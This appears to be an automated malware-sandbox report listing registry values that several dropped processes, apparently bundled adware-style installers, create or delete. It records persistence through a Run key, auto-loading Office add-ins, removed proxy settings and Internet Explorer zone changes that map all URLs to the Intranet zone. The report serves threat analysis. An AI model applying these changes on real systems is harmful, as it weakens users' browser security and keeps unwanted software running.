[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process mankind.exe:2904 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 9F 2A 77 F8 90 76 AF F7 56 90 07 A5 B7 F6 D7"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%System%\config\systemprofile\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%System%\config\systemprofile\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%System%\config\systemprofile\Local Settings\Temporary Internet Files"
The process AppleDTAssistant.exe:1856 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\AppleDesktop]
"UOD" = "1008"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\AppleDesktop]
"POD" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\AppleDesktop]
"qd" = "28"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C F1 56 0A FA 36 81 2B 2B 48 0C E0 E4 C5 87 E1"
[HKCU\Software\AppleDesktop]
"InstVersion" = "2.0.1.1001"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:2112 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Classes\WpsAssist.Control.1\CLSID]
"(Default)" = "{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}"
[HKCU\Software\Classes\WpsAssist.Addins]
"(Default)" = "WpsAssist Class"
[HKCU\Software\Classes\WpsAssist.Addins.1\CLSID]
"(Default)" = "{C800994F-EC9B-46F9-9B01-31CE04E90063}"
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"Description" = "PPT美化大师"
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"CommandLineSafe" = "1"
[HKCU\Software\Classes\WpsAssist.Addins.1]
"(Default)" = "WpsAssist Class"
[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"CommandLineSafe" = "1"
[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}]
"(Default)" = "IWpsAssistControl"
[HKCU\Software\Classes\WpsAssist.Control.1]
"(Default)" = "WpsAssistControl Class"
[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"Description" = "PPT美化大师"
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\ProgID]
"(Default)" = "WpsAssist.Addins.1"
[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"Description" = "PPT美化大师"
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\VersionIndependentProgID]
"(Default)" = "WpsAssist.Control"
[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"FriendlyName" = "PPT美化大师"
[HKCU\Software\Classes\WpsAssist.Control]
"(Default)" = "WpsAssistControl Class"
[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Classes\WpsAssist.Control\CLSID]
"(Default)" = "{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}"
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll"
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"CommandLineSafe" = "1"
[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\Version]
"(Default)" = "1.0"
[HKCU\Software\Classes\WpsAssist.Control\CurVer]
"(Default)" = "WpsAssist.Control.1"
[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\WpsAssist.Addins\CurVer]
"(Default)" = "WpsAssist.Addins.1"
[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0]
"(Default)" = "WpsAssist 1.0 ÀàÃÂÿâ"
[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}]
"(Default)" = "WpsAssist Class"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"FriendlyName" = "PPT美化大师"
[HKCU\Software\Microsoft\Office\Word\Addins\WpsAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\WpsAssist.Addins]
"LoadBehavior" = "3"
[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist"
[HKCU\Software\Microsoft\Office\Excel\Addins\WpsAssist.Addins]
"FriendlyName" = "PPT美化大师"
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 97 9C 28 1F 3A 86 00 08 F9 F3 B5 F9 BF C2 D2"
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\ProgID]
"(Default)" = "WpsAssist.Control.1"
[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Classes\WpsAssist.Addins\CLSID]
"(Default)" = "{C800994F-EC9B-46F9-9B01-31CE04E90063}"
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\VersionIndependentProgID]
"(Default)" = "WpsAssist.Addins"
[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}]
"(Default)" = "IRibbonCallback"
[HKCR\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll"
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}]
"(Default)" = "WpsAssistControl Class"
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\InprocServer32]
"ThreadingModel" = "Apartment"
The Dropped deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\InprocServer32]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\Programmable]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\TypeLib]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\InprocServer32]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\Version]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\ProgID]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\TypeLib]
[HKCU\Software\Classes\CLSID\{C800994F-EC9B-46F9-9B01-31CE04E90063}\ProgID]
[HKCU\Software\Classes\CLSID\{8BAB4A62-0A52-48DB-A768-F57A7A6B4994}\Programmable]
The process regsvr32.exe:500 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 73 7C 27 97 C1 0E BE AB 38 1F 25 08 AB 86 AD"
The process regsvr32.exe:2324 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 64 24 7F 45 C2 5E 45 46 EE FE 99 85 D3 55 2E"
The process kindness.exe:2856 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 4D C8 8E DB A8 52 5C CC 16 4D C9 6C 80 3C 14"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
The process Application Dataypfbyfgmr.exe:2796 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 9E D6 00 9B D6 DA E7 06 D8 CE CF CE 68 F0 54"
The process iApple.exe:1748 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 81 F7 6F F4 8E 02 68 A1 40 75 03 53 48 48 F4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\AppleDesktop\2.0.1.1001]
"AppleDesktop.exe" = "苹果桌面"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Dropped modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Dropped modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Dropped modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process apples_5_1008.exe:816 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\苹果桌面]
"InstallDate" = "2014-9-18"
[HKCU\Software\AppleDesktop]
"DisableAutorun" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\苹果桌面]
"DisplayName" = "苹果桌面"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\苹果桌面]
"DisplayVersion" = "2.0.1.1001"
"Publisher" = "³É¶¼Ãª»ªÃÂÅè¿Æ¼¼ÓÃÂÃÂÞ¹«Ë¾"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iApple.exe]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iApple.exe]
"Path" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\苹果桌面]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 FB 30 D5 CA C6 3D 19 E1 9B DC F4 37 BC E1 EB"
[HKCU\Software\AppleDesktop]
"InstVersion" = "2.0.1.1001"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\苹果桌面]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\uninst.exe /from=reg"
"InstallLocation" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Dropped adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"苹果桌面" = "%Documents and Settings%\%current user%\Application Data\AppleDesktop\iApple.exe /from=autorun"
The Dropped deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process tqrl_89_177560.exe:1644 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\inskk]
"Install" = "1"
[HKLM\SOFTWARE\tianqic]
"ED" = "89"
"EN" = "tqrl_89_177560.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\tianqic]
"et" = "2014-9-18"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tqrili]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\tianqic]
"EX" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
